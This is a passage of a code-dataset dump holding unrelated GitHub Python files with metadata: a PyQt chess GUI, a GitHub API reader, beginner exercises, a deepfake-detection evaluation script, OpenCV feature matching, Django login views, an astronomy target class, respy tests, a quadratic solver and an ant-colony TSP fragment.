self.getGridIndex()[1])\n\t\tself.move_buttons[-1].show()\n\t\tself.moves_wrapper.verticalScrollBar().setSliderPosition(self.moves_wrapper.verticalScrollBar().maximum())\n\t\tself.moves_count += 0.5\n\t\tasyncio.get_event_loop().run_until_complete(self.updateOpening())\n\t\tif self.game.game_over:\n\t\t\tself.takeback.deleteLater()\n\t\t\tself.game_over_label = QLabel(\"Game Over\", self)\n\t\t\tself.game_over_label.setFont(QFont(QFontDatabase.applicationFontFamilies(QFontDatabase.addApplicationFont(QDir.currentPath() + \"/fonts/ChakraPetch-Light.ttf\"))[0], 22))\n\t\t\tself.game_over_label.setAlignment(Qt.AlignCenter)\n\t\t\tself.game_over_label.setFixedWidth(self.opening.width())\n\t\t\tself.game_over_label.show()\n\t\t\tif self.game.drawn:\n\t\t\t\tself.parent().parent().setWindowTitle(\"2-Player Chess Game: Draw\")\n\t\t\t\tif self.game.is_stalemate:\n\t\t\t\t\tself.game_result_label = QLabel(\"Stalemate 1/2-1/2\", self)\n\t\t\t\telif self.game.is_fivefold_repetition:\n\t\t\t\t\tself.game_result_label = QLabel(\"Fivefold Repetition 1/2-1/2\", self)\n\t\t\t\telif self.game.insufficient_material:\n\t\t\t\t\tself.game_result_label = QLabel(\"Insufficient Material 1/2-1/2\", self)\n\t\t\t\telse:\n\t\t\t\t\tself.game_result_label = QLabel(\"Seventy Five Moves Without Progress 1/2-1/2\", self)\n\t\t\t\tself.game_result_label.show()\n\t\t\telse:\n\t\t\t\tself.parent().parent().setWindowTitle(\"2-Player Chess Game: \" + {\"white\": \"Black\", \"black\": \"White\"}[self.game.turn] + \" wins\")\n\t\t\t\tself.game_result_label = QLabel({\"white\": \"Black\", \"black\": \"White\"}[self.game.turn] + \" wins \" + self.game.tags[\"Result\"], self)\n\t\t\t\tself.game_result_label.show()\n\t\t\tself.game_over_label.move(QPoint(self.width() // 4 - self.opening.width(), self.height() // 2 + self.opening.height()))\n\t\t\tself.game_result_label.move(QPoint(self.width() // 4 - self.opening.width(), self.height() // 2 + self.opening.height() + self.game_over_label.height()))\n\t\t\tself.game_result_label.setFont(QFont(QFontDatabase.applicationFontFamilies(QFontDatabase.addApplicationFont(QDir.currentPath() + \"/fonts/ChakraPetch-Light.ttf\"))[0], 20))\n\t\t\tself.game_result_label.setAlignment(Qt.AlignCenter)\n\t\t\tself.game_result_label.setFixedWidth(self.opening.width())\n\t\t\tif self.clocks:\n\t\t\t\tif self.clocks[0].running:\n\t\t\t\t\tself.clocks[0].pause()\n\t\t\t\tif self.clocks[1].running:\n\t\t\t\t\tself.clocks[1].pause()\n\t\t\tself.game_over = True\n\t\t\treturn\n\t\tif self.clocks:\n\t\t\tif not self.time_control.endswith(\"+0\") and \"+\" in self.time_control:\n\t\t\t\tif self.clocks[1].running:\n\t\t\t\t\tself.clocks[1].clock_seconds += int(self.time_control[self.time_control.index(\"+\") + 1:-1])\n\t\t\t\t\tif self.clocks[1].clock_seconds > 59:\n\t\t\t\t\t\tself.clocks[1].clock_minutes += 1\n\t\t\t\t\t\tself.clocks[1].clock_seconds -= 60\n\t\t\t\t\tself.clocks[1].updateText()\n\t\t\t\tif self.clocks[0].running:\n\t\t\t\t\tself.clocks[0].clock_seconds += int(self.time_control[self.time_control.index(\"+\") + 1:-1])\n\t\t\t\t\tif self.clocks[0].clock_seconds > 59:\n\t\t\t\t\t\tself.clocks[0].clock_minutes += 1\n\t\t\t\t\t\tself.clocks[0].clock_seconds -= 60\n\t\t\t\t\tself.clocks[0].updateText()\n\t\t\tif \"+\" not in self.time_control:\n\t\t\t\tself.clocks[0].resetClock()\n\t\t\t\tself.clocks[1].resetClock()\n\t\t\tif self.clocks[0].running:\n\t\t\t\tself.clocks[0].pause()\n\t\t\t\tself.clocks[1].start()\n\t\t\telif self.clocks[1].running:\n\t\t\t\tself.clocks[1].pause()\n\t\t\t\tself.clocks[0].start()\n\n\tasync def updateOpening(self):\n\t\tposition = self.game.FEN().split()[0]\n\t\tfor i in chess.openings.openings:\n\t\t\tif i[\"position\"] == position:\n\t\t\t\tself.opening.setText(i[\"eco\"] + \" \" + i[\"name\"])\n\t\t\t\treturn\n\n\tasync def updateTakebackOpening(self):\n\t\tgame = chess.Game()\n\t\topening = \"Starting Position\"\n\t\tfor x in self.game.raw_move_list:\n\t\t\tgame.move(x.name, evaluate_checks=False, evaluate_move_checks=False, evaluate_move_checkmate=False)\n\t\t\tposition = game.FEN().split()[0]\n\t\t\tfor y in chess.openings.openings:\n\t\t\t\tif y[\"position\"] == position:\n\t\t\t\t\topening = y[\"eco\"] + \" \" + y[\"name\"]\n\t\t\t\t\tbreak\n\t\tself.opening.setText(opening)\n\n\tdef updateSettingsValues(self):\n\t\tself.settings_values = json.load(open(\"settings.json\"))\n\n\tdef keyPressEvent(self, event):\n\t\tself.board.keyPressEvent(event)\n\t\tsuper(TwoPlayers, self).keyPressEvent(event)\n\n\tdef resizeEvent(self, event) -> None:\n\t\tself.sidebar.resize(QSize(event.size().width() - (self.width() // 2) + 400, event.size().height() - 200))\n\t\tself.sidebar.move(QPoint((event.size().width() // 2) + 400, 100))\n\t\tself.animation.setStartValue(QPoint(event.size().width(), 0))\n\t\tself.opening.move(QPoint(event.size().width() // 4 - self.opening.width(), event.size().height() // 2))\n\t\tself.takeback.move(QPoint(event.size().width() // 4 - self.opening.width(), event.size().height() // 2 + self.opening.height()))\n\t\tif self.game_over_label is not None and self.game_result_label is not None:\n\t\t\tself.game_over_label.move(QPoint(event.size().width() // 4 - self.opening.width(), event.size().height() // 2 + self.opening.height()))\n\t\t\tself.game_result_label.move(QPoint(event.size().width() // 4 - self.opening.width(), event.size().height() // 2 + self.opening.height() + self.game_over_label.height()))\n\t\t\tself.game_over_label.setFixedWidth(self.opening.width())\n\t\t\tself.game_result_label.setFixedWidth(self.opening.width())\n\t\tif self.clocks:\n\t\t\tself.clocks[0].move(QPoint(event.size().width() - self.clocks[0].width() - 10, event.size().height() - self.clocks[0].height() - 20))\n\t\t\tself.clocks[1].move(QPoint(event.size().width() - self.clocks[0].width() - 10, 20))\n\t\tif event.size().width() > event.size().height():\n\t\t\tmin_size = event.size().height()\n\t\telse:\n\t\t\tmin_size = event.size().width()\n\t\tself.back_button.resize(QSize(min_size // 20, min_size // 20))\n\t\tself.back_button.move(QPoint(0, 0))\n\t\tself.takeback.resize(QSize(min_size // 40, min_size // 40))\n\t\tsuper(TwoPlayers, self).resizeEvent(event)\n\t\tif self.board is not None:\n\t\t\tself.board.resizeComponents()\n\t\t\tself.board.move(QPoint((self.width() - (self.board.squares[0].width() * 10)) // 2, (self.height() - (self.board.squares[0].width() * 10)) // 2))\n","repo_name":"DanielMiao1/ChessGraphics","sub_path":"twoplayers.py","file_name":"twoplayers.py","file_ext":"py","file_size_in_byte":17317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6295614906","text":"from github import Github\r\nimport base64\r\nimport os\r\nimport xml.etree.ElementTree as ET\r\n\r\n# Github Interface and Auth using Personal Access Token\r\ng = Github(os.environ['GITPAT'])\r\nrepo = g.get_repo(\"kthfspe/SA\")\r\ncontents = repo.get_contents(\"examples/LV_architecture/LV_functional_architecture\")\r\ns = base64.b64decode(contents.content)\r\nroot = ET.fromstring(s)\r\n\r\nLVphysical = []\r\nfor child in root.findall('diagram/mxGraphModel/root/object'):\r\n LVphysical.append(child.attrib)\r\n\r\nprint(len(LVphysical))\r\n\r\n# Do checks before instance merging\r\nfor child in LVphysical:\r\n if child['BlockType'] == \"FS\":\r\n print(child)\r\n\r\n# Instance merging\r\n\r\n\r\n\r\n# Do checks on final datamodel\r\n\r\n#tree = ET.ElementTree(root)\r\n#s = ET.tostring(root,encoding='utf-8')\r\n#s = s.decode('utf-8')\r\n\r\n#Working Commit line\r\n#repo.update_file(\"examples/LV_architecture/LV_physical_architecture\",\"Testing commit\", s, contents.sha, )\r\n","repo_name":"kthfspe/SAT","sub_path":"archive/readfilefromgithub.py","file_name":"readfilefromgithub.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8433513839","text":"def is_factor(a, b):\n if b % a == 0:\n return True\n else:\n return False\n\nprint(is_factor(11, 3))\ndef is_factor2(x, y):\n if y == x**2 - x*2:\n return True\n else:\n return False\nprint (is_factor2(3,0))\n\n\n\nfrom fractions import Fraction\na = Fraction(input('enter a number:'))\nprint (a)\n\n\n\nz = complex(input('Enter a complex number: '))\nprint (z)\n\n\n\nfor i in range (-10, 10):\n print (i)\n\ndef factors(b):\n for i in range(1, b+1):\n if b % i == 0:\n print(i)\n\nif __name__ == '__main__':\n b = input('Your Number Please: ')\n b = float(b)\n if b > 0 and b.is_integer():\n factors (int(b))\n else:\n print('Please enter a positive integer')\n\n\nF = 98.6\nprint (F - 32) * (5 / 9)","repo_name":"zpl2020/python-learning","sub_path":"example01.py","file_name":"example01.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73151219292","text":"\nfrom dataset import Deepfake_Dataset\nimport os\nimport torch\nimport torch.nn as nn\nimport numpy as np\nfrom torch.utils.data import DataLoader\nfrom torchvision.utils import save_image\nfrom tqdm import tqdm\nimport json\nfrom configs.config import config\n# from Pytorch_UNet.unet.unet_model import UNet_backbone\nfrom models.model_mae import mae_vit_base_patch16\n\nimport matplotlib.pyplot as plt\n\nmodel_to_test = ''\ntest_json = open('../data_label/' + config.val_label_path)\ntest_dict = json.load(test_json)\ndataloader = DataLoader(Deepfake_Dataset(test_dict, cali=16), batch_size=1, shuffle=True)\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpus\n\n\nnet = mae_vit_base_patch16()\nnet = nn.DataParallel(net).cuda()\ncheckpoint = torch.load(model_to_test)\nnet.load_state_dict(checkpoint[\"state_dict\"], strict=False)\nnet = net.module\n\ncriterion = {\n 'mse': nn.MSELoss().cuda(),\n 'l1': nn.L1Loss().cuda()\n}\n\nlabel_list = []\npred_list = []\n\nif not os.path.exists('output/'):\n os.makedirs('output/')\n\npatches = []\nfor i, data in tqdm(enumerate(dataloader)):\n data = data.cuda()\n loss, pred, mask = net(data, block=True)\n loss = torch.mean(loss)\n save_path = 'output/' + config.comment + '_' + str(i) + '_' + str(round(loss.item(), 4)) + '_real.png'\n\n output = net.unpatchify(pred)\n\n mask = mask.unsqueeze(2)\n masked_patchified_data = net.patchify(data) * (1 - mask)\n masked_data = net.unpatchify(masked_patchified_data)\n merge = net.unpatchify(masked_patchified_data + pred * mask)\n diff = torch.abs(merge - data) * 4\n save_image(torch.cat([data, masked_data, merge, diff]), save_path, nrow=4)\n\n print(i, 'Loss: ', loss.item())\n\n","repo_name":"shiliang26/RFFR","sub_path":"rffr_generative/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"37813155923","text":"\nimport numpy as np\nimport cv2\nimport sys\nfrom matplotlib import pyplot as plt\n\nFLANN_INDEX_KDTREE = 1\nFLANN_INDEX_LSH = 6\nindex_params = dict(algorithm=FLANN_INDEX_LSH,\n table_number=6, # 12\n key_size=12, # 20\n multi_probe_level=1) # 2\nFLANN_INDEX_KDTREE = 0\nindex_params2 = dict(algorithm=FLANN_INDEX_KDTREE, trees=5)\n\n# queryImage = cv2.imread('images/manowar_single.jpg', cv2.IMREAD_GRAYSCALE)\n# trainingImage = cv2.imread('images/manowar_logo.png', cv2.IMREAD_GRAYSCALE)\n# queryImage = cv2.imread('images/bathory_album.jpg', 0)\n# trainingImage = cv2.imread('images/bathory_vinyls.jpg', 0)\nqueryImage = cv2.imread('images/elephant.jpg', 0)\ntrainingImage = cv2.imread('data/s3/20181210-100736-2.jpg', 0)\n\norb = cv2.ORB_create()\n\nif __name__ == \"__main__\":\n\n if queryImage is None:\n print(\"queryImage not found\")\n sys.exit()\n\n if trainingImage is None:\n print(\"trainingImage not found\")\n sys.exit()\n\n kp1, des1 = orb.detectAndCompute(queryImage, None)\n kp2, des2 = orb.detectAndCompute(trainingImage, None)\n\n # FLANN matcher parameters\n flann = cv2.FlannBasedMatcher(index_params, {})\n matches = flann.knnMatch(des1, des2, k=2)\n # prepare an empty mask to draw good matches\n matchesMask = [[0, 0] for i in range(len(matches))]\n for i, match in enumerate(matches):\n if len(match) > 1 and match[0].distance < 0.7 * match[1].distance:\n matchesMask[i] = [1, 0]\n\n drawParams = dict(\n matchColor=(0, 255, 0),\n singlePointColor=(255, 0, 0),\n matchesMask=matchesMask,\n flags=0\n )\n\n resultImage = cv2.drawMatchesKnn(\n queryImage, kp1, trainingImage, kp2, matches, None, **drawParams)\n\n plt.imshow(resultImage), plt.show()\n","repo_name":"Tenjin0/python-opencv-base","sub_path":"introduction/30_feature_matching_flann-based.py","file_name":"30_feature_matching_flann-based.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20344419663","text":"from io import BytesIO\n\nfrom django.shortcuts import render,redirect,HttpResponse,HttpResponseRedirect\n\nfrom app01.models import Admin\nfrom app01.utils.form import LoginForm\nfrom app01 import models\nfrom app01.utils.gen_code import check_code\n\ndef login(request):\n if request.method == 'GET':\n if request.session.get('info'):\n return render(request,'index.html')\n form = LoginForm()\n return render(request,'login.html',{'form':form})\n\n form = LoginForm(request.POST)\n if form.is_valid():\n # 验证码校验\n ori_code = request.session.get('verify','')\n user_code = form.cleaned_data.pop('verify') # 后续验证中form应该把verify字段去掉\n if ori_code.upper() != user_code.upper():\n form.add_error('verify','验证码输入错误')\n return render(request,'login.html',{'form':form})\n\n # 验证用户名密码\n obj = models.Admin.objects.filter(**form.cleaned_data).first()\n # 数据库中不存在则返回登录界面并报错\n if obj is None:\n form.add_error('password',\"用户名或密码错误\")\n return render(request,'login.html',{'form':form})\n\n request.session['info'] = {'id':obj.id,'username':obj.username}\n request.session.set_expiry(60*60*24*7)\n resp = redirect('/index/')\n resp.set_cookie('mycook','314')\n return resp\n\n return render(request,'login.html',{'form':form})\n\ndef logout(request):\n request.session.clear()\n return redirect('/login/')\n\ndef get_code(request):\n img,code = check_code()\n\n request.session['verify'] = code\n request.session.set_expiry(60)\n\n stream = BytesIO() # 用BytesIO在内存中生成对象,用于保存验证码图片,就不用反复访问硬盘\n img.save(stream,'PNG')\n return HttpResponse(stream.getvalue())\n","repo_name":"mk-fault/djangoProject2","sub_path":"app01/views/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"71182222171","text":"import barycorrpy\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport configparser\nimport os\nfrom astroquery.mast import Catalogs\nfrom . import bary\nDIRNAME = os.path.dirname(__file__)\nPATH_TARGETS = os.path.join(DIRNAME,'data/target_files')\n\nclass Target(object):\n \"\"\"\n Simple target class. Capable of querying SIMBAD. Can calculate barycentric corrections.\n \n EXAMPLE:\n H = HPFSpectrum(fitsfiles[1])\n H.plot_order(14,deblazed=True)\n T = Target('G 9-40')\n T.calc_barycentric_velocity(H.jd_midpoint,'McDonald Observatory')\n T = Target('G 9-40')\n \"\"\"\n \n def __init__(self,name,config_folder=PATH_TARGETS,verbose=False,obsname='McDonald Observatory'):\n self.config_folder = config_folder\n self.config_filename = self.config_folder + os.sep + name + '.config'\n if name=='Teegarden':\n name = \"Teegarden's star\"\n if name=='HR8926-4':\n name = 'GL87'\n if name=='GJ_1151':\n name = 'GJ 1151'\n if name=='GJ_324_A':\n name = 'GJ_324A'\n if name=='HD_68988':\n name = 'HD 68988'\n if name=='NLTT_51984':\n name = 'GJ_9751'\n self.name = name\n try:\n self.data = self.from_file(verbose=verbose)\n except Exception as e:\n print(e,'File does not exist!')\n if 'TIC' in name:\n print('Querying TIC for data')\n self.data = self.query_tic(name)\n else:\n print('Querying SIMBAD for data')\n self.data, self.warning = barycorrpy.utils.get_stellar_data(name)\n self.to_file(self.data)\n self.ra = self.data['ra']\n self.dec = self.data['dec']\n self.pmra = self.data['pmra']\n self.pmdec = self.data['pmdec']\n self.px = self.data['px']\n self.epoch = self.data['epoch']\n if self.data['rv'] is None:\n self.rv = 0.\n else:\n self.rv = self.data['rv']/1000.# if self.data['rv'] < 1e20 else 0.\n self.obsname = obsname\n\n\n def query_tic(self,ticname):\n \"\"\"\n Query the TESS Input Catalog for data\n \"\"\"\n name = ticname.replace('-',' ').replace('_',' ')\n df = Catalogs.query_object(name, radius=0.0003, catalog=\"TIC\").to_pandas()[0:1]\n data = {}\n data['ra'] = df.ra.values[0]\n data['dec'] = df.dec.values[0]\n data['pmra'] = df.pmRA.values[0]\n data['pmdec'] = df.pmDEC.values[0]\n data['px'] = df.plx.values[0]\n data['epoch'] = 2451545.0\n data['rv'] = 0.\n return data\n\n def from_file(self,verbose=False):\n if verbose:\n print('Reading from file {}'.format(self.config_filename))\n #if os.path.exists(self.config_filename):\n config = configparser.ConfigParser()\n config.read(self.config_filename)\n data = dict(config.items('targetinfo'))\n for key in data.keys():\n data[key] = float(data[key])\n return data\n\n def to_file(self,data):\n print('Saving to file {}'.format(self.config_filename))\n config = configparser.ConfigParser()\n config.add_section('targetinfo')\n for key in data.keys():\n config.set('targetinfo',key,str(data[key]))\n print(key,data[key])\n with open(self.config_filename,'w') as f:\n config.write(f)\n print('Done')\n \n def calc_barycentric_velocity(self,jdtime,obs):\n \"\"\"\n OUTPUT:\n BJD_TDB\n berv in km/s\n \n EXAMPLE:\n bjd, berv = bary.bjdbrv(H.jd_midpoint,T.ra,T.dec,obsname='McDonald Observatory',\n pmra=T.pmra,pmdec=T.pmdec,rv=T.rv,parallax=T.px,epoch=T.epoch)\n \"\"\"\n #bjd, berv = bary.bjdbrv(jdtime,self.ra,self.dec,obsname=self.obsname,\n # pmra=self.pmra,pmdec=self.pmdec,rv=self.rv,parallax=self.px,epoch=self.epoch)\n bjd, berv = bary.bjdbrv(jdtime,self.ra,self.dec,obsname=obs,\n pmra=self.pmra,pmdec=self.pmdec,rv=self.rv,parallax=self.px,epoch=self.epoch)\n return bjd, berv/1000.\n \n def __repr__(self):\n return \"{}, ra={:0.4f}, dec={:0.4f}, pmra={}, pmdec={}, rv={:0.4f}, px={:0.4f}, epoch={}\".format(self.name,\n self.ra,self.dec,self.pmra,self.pmdec,self.rv,self.px,self.epoch)\n","repo_name":"gummiks/hpfspec","sub_path":"hpfspec/target.py","file_name":"target.py","file_ext":"py","file_size_in_byte":4467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30214161474","text":"def naive(matrix, pattern):\n n = len(matrix)\n m = len(pattern)\n count = 0\n for i in range(n - m + 1):\n for s in range(n - m + 1):\n check_poz = True\n for j in range(m):\n if matrix[i][s+j] != pattern[j]:\n check_poz = False\n break\n if check_poz:\n check_pion = True\n for k in range(m - 1):\n if matrix[i+k+1][s] != pattern[k+1]:\n check_pion = False\n break\n if check_pion:\n print(\"Found pattern:\", i, s)\n count += 1\n print(\"Number of found patterns:\", count)\n\n\nf = open('1000_pattern.txt', 'r')\nmatrix = []\nfor line in f:\n matrix.append(line)\nf.close()\npattern = \"ABC\"\nprint(\"Naive algorithm\")\nnaive(matrix, pattern)\n","repo_name":"Mastani-ep/AGH_ICT_AISD","sub_path":"Lab7-Wyszukiwanie_Wzorców/Zad1.py","file_name":"Zad1.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18493648559","text":"\"\"\"Test model generation.\"\"\"\nimport io\nimport textwrap\n\nimport numpy as np\nimport pandas as pd\nimport pytest\n\nfrom respy.config import EXAMPLE_MODELS\nfrom respy.likelihood import get_log_like_func\nfrom respy.pre_processing.model_checking import validate_options\nfrom respy.pre_processing.model_processing import _add_default_is_inadmissible\nfrom respy.pre_processing.model_processing import _convert_labels_in_formulas_to_codes\nfrom respy.pre_processing.model_processing import _parse_exogenous_processes\nfrom respy.pre_processing.model_processing import _parse_initial_and_max_experience\nfrom respy.pre_processing.model_processing import _parse_measurement_errors\nfrom respy.pre_processing.model_processing import _parse_observables\nfrom respy.pre_processing.model_processing import _parse_shocks\nfrom respy.pre_processing.model_processing import process_params_and_options\nfrom respy.tests.random_model import generate_random_model\nfrom respy.tests.random_model import simulate_truncated_data\nfrom respy.tests.utils import process_model_or_seed\n\n\ndef test_generate_random_model():\n \"\"\"Test if random model specifications can be simulated and processed.\"\"\"\n params, options = generate_random_model()\n\n df = simulate_truncated_data(params, options)\n\n log_like = get_log_like_func(params, options, df)\n\n crit_val = log_like(params)\n\n assert isinstance(crit_val, float)\n\n\n@pytest.mark.integration\n@pytest.mark.parametrize(\"model_or_seed\", EXAMPLE_MODELS)\ndef test_model_options(model_or_seed):\n _, options = process_model_or_seed(model_or_seed)\n\n _, options = process_params_and_options(_, options)\n\n validate_options(options)\n\n\n@pytest.mark.unit\n@pytest.mark.precise\ndef test_parse_initial_and_max_experience():\n \"\"\"Test ensures that probabilities are transformed with logs and rest passes.\"\"\"\n choices = [\"a\", \"b\"]\n\n options = {\"n_periods\": 10}\n optim_paras = {\"choices_w_exp\": choices, \"choices\": {\"a\": {}, \"b\": {}}}\n params = pd.DataFrame(\n {\n \"category\": [\n \"initial_exp_a_0\",\n \"initial_exp_a_5\",\n \"initial_exp_b_0\",\n \"initial_exp_b_5\",\n \"maximum_exp\",\n ],\n \"name\": [\"probability\"] * 2 + [\"constant\"] * 2 + [\"b\"],\n \"value\": [2, 2, np.log(2), np.log(2), 5],\n }\n ).set_index([\"category\", \"name\"])[\"value\"]\n\n with pytest.warns(UserWarning, match=r\"The probabilities for parameter group\"):\n optim_paras = _parse_initial_and_max_experience(optim_paras, params, options)\n\n assert (\n optim_paras[\"choices\"][\"a\"][\"start\"][0]\n == optim_paras[\"choices\"][\"a\"][\"start\"][5]\n ).all()\n assert (\n optim_paras[\"choices\"][\"b\"][\"start\"][0]\n == optim_paras[\"choices\"][\"b\"][\"start\"][5]\n ).all()\n assert optim_paras[\"choices\"][\"a\"][\"max\"] == options[\"n_periods\"] - 1 + max(\n optim_paras[\"choices\"][\"a\"][\"start\"]\n )\n assert optim_paras[\"choices\"][\"b\"][\"max\"] == 5\n\n\n@pytest.mark.unit\n@pytest.mark.precise\ndef test_normalize_probabilities():\n constraints = {\"observables\": [3]}\n params, options = generate_random_model(point_constr=constraints)\n optim_paras_1, _ = process_params_and_options(params, options)\n\n for group in [\"initial_exp_edu\", \"observable_\"]:\n mask = params.index.get_level_values(0).str.contains(group)\n params.loc[mask, \"value\"] = params.loc[mask, \"value\"].to_numpy() / 2\n\n with pytest.warns(UserWarning, match=r\"The probabilities for parameter group\"):\n optim_paras_2, _ = process_params_and_options(params, options)\n\n for key in optim_paras_1[\"choices\"][\"edu\"][\"start\"]:\n np.testing.assert_array_almost_equal(\n optim_paras_1[\"choices\"][\"edu\"][\"start\"][key],\n optim_paras_2[\"choices\"][\"edu\"][\"start\"][key],\n )\n for level in optim_paras_1[\"observables\"][\"observable_0\"]:\n np.testing.assert_array_almost_equal(\n optim_paras_1[\"observables\"][\"observable_0\"][level],\n optim_paras_2[\"observables\"][\"observable_0\"][level],\n )\n\n\n@pytest.mark.unit\n@pytest.mark.precise\ndef test_convert_labels_in_covariates_to_codes():\n optim_paras = {\n \"choices\": [\"fishing\", \"hammock\"],\n \"observables\": {\"fishing_grounds\": [\"poor\", \"rich\"]},\n \"choices_w_exp\": [\"fishing\"],\n }\n\n options = {\n \"covariates\": {\n \"rich_fishing_grounds\": \"fishing_grounds == 'rich'\",\n \"do_fishing\": \"choice == 'fishing'\",\n \"do_hammock\": 'choice == \"hammock\"',\n },\n \"core_state_space_filters\": [],\n \"negative_choice_set\": {},\n }\n\n options = _convert_labels_in_formulas_to_codes(options, optim_paras)\n\n expected = {\n \"rich_fishing_grounds\": \"fishing_grounds == 1\",\n \"do_fishing\": \"choice == 0\",\n \"do_hammock\": \"choice == 1\",\n }\n\n assert options[\"covariates\"] == expected\n\n\n@pytest.mark.unit\n@pytest.mark.precise\ndef test_parse_observables():\n params = pd.read_csv(\n io.StringIO(\n textwrap.dedent(\n \"\"\"\n category,name,value\n observable_fishing_grounds_rich_grounds,probability,0.5\n observable_fishing_grounds_poor_grounds,probability,0.5\n observable_ability_low_middle,probability,0.5\n observable_ability_high,probability,0.5\n \"\"\"\n )\n ),\n index_col=[\"category\", \"name\"],\n )[\"value\"]\n optim_paras = _parse_exogenous_processes({}, params)\n optim_paras = _parse_observables(optim_paras, params)\n\n expected = {\n \"fishing_grounds\": {\n \"rich_grounds\": pd.Series(data=np.log(0.5), index=[\"constant\"]),\n \"poor_grounds\": pd.Series(data=np.log(0.5), index=[\"constant\"]),\n },\n \"ability\": {\n \"low_middle\": pd.Series(data=np.log(0.5), index=[\"constant\"]),\n \"high\": pd.Series(data=np.log(0.5), index=[\"constant\"]),\n },\n }\n\n for observable, level_dict in optim_paras[\"observables\"].items():\n for level in level_dict:\n assert optim_paras[\"observables\"][observable][level].equals(\n expected[observable][level]\n )\n\n\n@pytest.mark.unit\n@pytest.mark.precise\ndef test_raise_exception_for_missing_meas_error():\n params, options = generate_random_model()\n\n params = params.drop(index=(\"meas_error\", \"sd_b\"))\n\n with pytest.raises(KeyError):\n _parse_measurement_errors(params, options)\n\n\n@pytest.mark.unit\n@pytest.mark.precise\ndef test_raise_exception_for_missing_shock_matrix():\n params, _ = generate_random_model()\n\n params = params.drop(index=\"shocks_sdcorr\", level=\"category\")\n\n with pytest.raises(KeyError):\n _parse_shocks({}, params)\n\n\n@pytest.mark.unit\n@pytest.mark.precise\n@pytest.mark.parametrize(\"observables\", [[2], [2, 2]])\ndef test_raise_exception_for_observable_with_one_value(observables):\n point_constr = {\"observables\": observables}\n params, _ = generate_random_model(point_constr=point_constr)\n\n params = params.drop(index=\"observable_observable_0_0\", level=\"category\")[\"value\"]\n\n with pytest.raises(ValueError, match=r\"Observables and exogenous processes\"):\n _parse_observables({}, params)\n\n\n@pytest.mark.unit\n@pytest.mark.parametrize(\n \"optim_paras, expected\",\n [\n (\n {\n \"choices_w_exp\": [\"a\"],\n \"choices_wo_exp\": [\"b\"],\n \"choices\": {\"a\": {\"start\": [0], \"max\": 4}},\n \"n_periods\": 5,\n },\n {\"negative_choice_set\": {\"a\": [\"False\"], \"b\": [\"False\"]}},\n ),\n (\n {\n \"choices_w_exp\": [\"a\"],\n \"choices_wo_exp\": [\"b\"],\n \"choices\": {\"a\": {\"start\": [0], \"max\": 5}},\n \"n_periods\": 5,\n },\n {\"negative_choice_set\": {\"a\": [\"False\"], \"b\": [\"False\"]}},\n ),\n (\n {\n \"choices_w_exp\": [\"a\"],\n \"choices_wo_exp\": [\"b\"],\n \"choices\": {\"a\": {\"start\": [0], \"max\": 3}},\n \"n_periods\": 5,\n },\n {\"negative_choice_set\": {\"a\": [\"exp_a == 3\"], \"b\": [\"False\"]}},\n ),\n (\n {\n \"choices_w_exp\": [\"a\"],\n \"choices_wo_exp\": [],\n \"choices\": {\"a\": {\"start\": [11, 13], \"max\": 15}},\n \"n_periods\": 5,\n },\n {\"negative_choice_set\": {\"a\": [\"exp_a == 15\"]}},\n ),\n ],\n)\ndef test_add_default_is_inadmissible(optim_paras, expected):\n options = {\"negative_choice_set\": {}}\n result = _add_default_is_inadmissible(options, optim_paras)\n assert result == expected\n","repo_name":"OpenSourceEconomics/respy","sub_path":"respy/tests/test_model_processing.py","file_name":"test_model_processing.py","file_ext":"py","file_size_in_byte":8715,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"32"} +{"seq_id":"20551199882","text":"import math\nimport cmath\n\na = 0\nb = 0\nc = 0\nD = 0\nx1 = 0\nx2 = 0\n\nf = print('Введите коэффициенты квадратного уравнения (ax^2+bx+c=0)')\na = float(input('Введите a : '))\nb = float(input('Введите b : '))\nc = float(input('Введите c : '))\nD = b**2 - 4*a*c\nprint('Дискриминант равен = {}'.format(D))\n\nif D < 0: \n print('Дискриминант отрицательный, два комплексных корня')\n x1 = complex((-b+cmath.sqrt(D)) / (2*a))\n x2 = complex((-b-cmath.sqrt(D)) / (2*a))\n print('Первый корень равен = {}'.format(x1))\n print('Второй корень равен = {}'.format(x2))\n\nelif D == 0: \n print('Дискриминант равен 0, один корень')\n x1 = (-b) / (2*a)\n print('Корень равен = {}'.format(x1))\n\nelse:\n print('Дискриминант больше нуля, два корня')\n x1 = (-b+math.sqrt(D)) / (2*a)\n x2 = (-b-math.sqrt(D)) / (2*a)\n print('Первый корень равен = {}'.format(x1))\n print('Второй корень равен = {}'.format(x2))","repo_name":"KristaliX/Fukin-Ivan","sub_path":"Homework 3/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70443600733","text":"# Autor: Carlo Corrales Delgado\n# usar el Algoritmo del Sistema de Hormigas para calcular TSP\n\nimport math\nimport sys\nimport random\n\ndef pasoPor(i,j,k,caminosHormigas): #paso por i,j la hormiga k\n for m in range(ciudades-1):\n if (caminosHormigas[k][m]==i and caminosHormigas[k][m+1]==j) or (caminosHormigas[k][m]==j and caminosHormigas[k][m+1]==i):\n return True\n return False\ndef truncate(nro,dec):\n pos = pow(10.0,dec)\n return math.trunc(pos*nro)/pos\n\n#####\n\nfile = 